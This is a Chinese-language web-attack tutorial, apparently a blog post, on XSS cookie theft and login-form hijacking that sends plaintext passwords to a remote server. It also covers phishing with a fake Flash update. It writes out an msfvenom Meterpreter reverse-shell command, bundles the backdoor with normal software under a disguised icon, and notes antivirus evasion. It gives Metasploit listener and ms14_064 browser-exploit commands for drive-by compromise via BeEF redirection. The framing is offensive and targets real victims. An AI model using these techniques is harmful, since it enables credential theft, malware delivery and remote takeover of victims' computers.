37、WEB攻防——通用漏洞&XSS跨站&权限维持&捆绑钓鱼&浏览器漏洞

文章目录


要想获取有效的cookie,需要:1、网站本身采用cookie进行验证;2、网站未做http-only等的防御手段。

XSS------后台植入Cookie&表单劫持(获取明文密码)

  1. 后台植入XSS获取Cookie,主要是在登录成功的文件中写入XSS代码,一旦有人登录成功访问登录成功的代码,就会触发XSS;
  2. 表单劫持,找到将用户名、密码提交给的特定文件,然后在文件中写入XSS,将明文用户名和密码发给远程服务器。
  • 后端php代码中的echo都会输出到html页面;html页面中的js代码如<script>会被
    浏览器执行。
  • 表单劫持主要解决网站不使用cookie进行验证;获取明文密码。

XSS------Flash钓鱼配合MSF捆绑上线

条件:Beef上线受控后或直接钓鱼(受害这爱看sese)

  1. 生成后门,msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=6666 -f exe > flash.exe
  2. 生成钓鱼网站,立即下载 捆绑文件(正常软件+后门文件)

    捆绑文件:
    一起压缩两个文件


这样就生成了一个捆绑文件。下一步使用资源修改器Restorator更改压缩文件的图标,使得其更加逼真。

为了更加隐蔽,还需要对后门文件进行免杀处理。

  1. MSF配置监听状态:
bash 复制代码
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0 # 0.0.0.0代表本地任何网卡
set lport 6666
run # 监听
  1. 为什么点击该钓鱼网站:beef受控访问;某种爱好,提示flash版本低,需要安装新版flash。

XSS------浏览器网马配合MSF访问上线

条件:Beef上线受控后&直接钓鱼(浏览器存在0day),这种方式是直接攻击浏览器,生成带有网马的地址。用户一旦访问该网站,直接攻击浏览器,获取主机权限。

  1. 配置MSF生成URL(cve)
bash 复制代码
use exploit/windows/browser/ms14_064_old_code_execution
set allowpowershellpropmt true
set target 1
run
  1. 诱使受害者访问URL,思路:中了XSS之后,用beef直接跳转到网马网站

若漏洞是针对IE浏览器的,使用IE内核的其他浏览器也可能受该漏洞影响。注意漏洞的利用条件(系统版本、浏览器版本)

相关推荐
LinXunFeng15 分钟前
Flutter 拖拉对比组件,换装图片前后对比必备
前端·flutter·开源
BD_Marathon16 分钟前
【PySpark】安装测试
前端·javascript·ajax
stu_kk24 分钟前
Ecology9明细表中添加操作按钮与弹窗功能技术分享
前端·oa
dkgee26 分钟前
如何禁止Chrome的重新启动即可更新窗口弹窗提示
前端·chrome
天若有情6731 小时前
新闻通稿 | 软件产业迈入“智能重构”新纪元:自主进化、人机共生与责任挑战并存
服务器·前端·后端·重构·开发·资讯·新闻
香香爱编程1 小时前
electron对于图片/视频无法加载的问题
前端·javascript·vue.js·chrome·vscode·electron·npm
程序猿_极客1 小时前
【期末网页设计作业】HTML+CSS+JavaScript 蜡笔小新 动漫主题网站设计与实现(附源码)
前端·javascript·css·html·课程设计·期末网页设计
zl_vslam2 小时前
SLAM中的非线性优-3D图优化之轴角在Opencv-PNP中的应用(一)
前端·人工智能·算法·计算机视觉·slam se2 非线性优化
CDwenhuohuo2 小时前
用spark-md5实现切片上传前端起node模拟上传文件大小,消耗时间
前端
阿桂有点桂2 小时前
React使用笔记(持续更新中)
前端·javascript·react.js·react